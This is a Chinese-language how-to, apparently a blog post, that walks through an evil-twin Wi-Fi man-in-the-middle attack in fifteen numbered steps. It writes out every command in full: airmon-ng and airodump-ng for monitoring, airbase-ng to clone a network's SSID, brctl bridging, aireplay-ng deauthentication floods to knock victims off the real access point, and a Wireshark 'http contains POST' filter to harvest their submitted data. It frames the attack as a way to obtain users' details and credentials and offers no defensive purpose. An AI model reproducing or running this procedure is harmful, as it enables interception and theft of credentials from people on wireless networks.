抓取wifi数据包和中间人攻击
通过伪造相同名称的wifi接入点,配合发送ARP数据包,攻击连入伪造wifi的用户。一个与原有wifi相同名称的伪造接入点一旦建立,会导致用户从原有链接中断开,并连入攻击者所建立的伪造接入点中,因此所有的通信通道都会流经自己的系统,届时我们通常会用注入的方式拿到用户所有的细节/授信状态/信息等。
操作方法
- 01开BT5的终端,然后输入”iwconfig” 检查无线网卡 "iwconfig"类似 linux kali中的“ifconfig” 
- 02输入“airmon-ng start wlan0”开启无线网卡。 这个命令可以无线网卡处于监听状态 *注 wlan0为无线网卡的名称 开启后“wlan0"变为”mon0“ kali 变为wlan0mon 
- 03启动监听模式后,输入“airodump-ng mon0”开始抓包; 
- 04设置airodump-ng中显示的频道ID *ch为频道id 输入命令为: iwconfig mon0 channel 频道ID iwconfig wlan0 channel 频道ID 
- 05现在开始建立你的伪造路由器,命令如下: airbase-ng -e "SSiD" 网卡名称 。 *airbase-ng 是可以针对AP(接入点)自身的客户端进行攻击; *“-e + SSID”指定伪造AP的SSID 
- 06现在是时候去“桥接”所有的网络了,命令如下 “brctl addbr mitm” “brctl addif mitm eth0” “brctl addif mitm at0” ***** Brctl 用来在两个网卡之间建立桥接网络。 Addbr 用来添加网桥的对象,用<name>来指定网桥的名称。 Addif 给已经使用addbr创建的网桥中添加一个网卡,后边的参数使用你要添加的网卡名称即可。 
- 07创建一个新的网卡配置,命令如下: ifconfig eth0 0.0.0.0 up ifconfig at0 0.0.0.0 up 
- 08启动我们用来做中间人攻击的网桥。 命令如下: ifconfig mitm up 
- 09使用下面的命令发送认证包到路由器: aireplay-ng - - deauth 0 - a MAC地址 mon0 *aireplay-ng 用来注入帧数据 * -a 指定被攻击者的BSSID。 
- 10开始给被攻击者分配IP,命令如下: dhclient3 mitm& 或者 dhclient3 mitm & * 使用类似DHCP的协议方式分配IP 
- 11你可以看看是不是有客户端已经连接上了,有的话会显示在第五步的那个命令终端里面。 
- 12开wireshark,命令:“wireshark&” 说明:wireshark是个网络协议抓包分析器。 
- 13选择网卡,点开始(start) 
- 14输入 “http contains POST”过滤一下,然后你就可以看到所有抓下来的数据包。 
- 15抓取wifi数据包和中间人攻击的效果图 
